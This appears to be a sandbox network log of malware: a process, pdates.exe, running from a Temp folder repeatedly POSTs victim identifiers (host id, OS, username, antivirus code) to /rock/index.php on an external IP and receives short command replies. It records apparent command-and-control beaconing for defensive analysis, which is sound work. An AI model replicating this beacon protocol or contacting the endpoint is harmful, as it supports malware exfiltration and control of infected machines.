Jul 27, 2023 01:35:58.130645037 CEST	5813	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:58.180991888 CEST	5814	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.5	49784	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:21.396688938 CEST	2911	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:21.445514917 CEST	2912	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
670	192.168.2.5	50392	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:58.334928036 CEST	5814	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:58.384474039 CEST	5814	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
671	192.168.2.5	50393	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:58.537290096 CEST	5815	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:58.586225033 CEST	5815	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
672	192.168.2.5	50394	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:58.753103018 CEST	5816	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:58.802504063 CEST	5816	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
673	192.168.2.5	50395	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:58.963767052 CEST	5817	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:59.012378931 CEST	5817	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
674	192.168.2.5	50396	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:59.171082973 CEST	5818	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:59.219485998 CEST	5818	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
675	192.168.2.5	50397	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:59.381422043 CEST	5819	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:59.430480003 CEST	5819	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
676	192.168.2.5	50398	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:59.586833000 CEST	5820	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:59.635042906 CEST	5820	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
677	192.168.2.5	50399	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:59.792963982 CEST	5821	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:59.841573954 CEST	5821	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
678	192.168.2.5	50400	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:00.002593994 CEST	5822	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:00.051539898 CEST	5822	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
679	192.168.2.5	50401	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:00.215797901 CEST	5823	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:00.265213013 CEST	5823	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.5	49785	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:21.647870064 CEST	2912	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:21.696491003 CEST	2912	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
680	192.168.2.5	50402	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:00.428524971 CEST	5824	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:00.477057934 CEST	5824	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
681	192.168.2.5	50403	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:00.648925066 CEST	5825	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:00.696603060 CEST	5825	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
682	192.168.2.5	50404	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:00.853437901 CEST	5826	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:00.902185917 CEST	5826	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
683	192.168.2.5	50405	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:01.071532965 CEST	5827	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:01.120407104 CEST	5827	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
684	192.168.2.5	50406	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:01.279371977 CEST	5828	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:01.327296019 CEST	5828	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
685	192.168.2.5	50407	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:01.501411915 CEST	5828	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:01.550587893 CEST	5829	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
686	192.168.2.5	50408	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:01.731764078 CEST	5829	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:01.780698061 CEST	5830	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
687	192.168.2.5	50409	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:01.943283081 CEST	5830	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:01.992369890 CEST	5831	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
688	192.168.2.5	50410	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:02.160783052 CEST	5831	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:02.209661007 CEST	5832	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
689	192.168.2.5	50411	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:02.378026009 CEST	5832	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:02.426256895 CEST	5833	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.5	49786	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
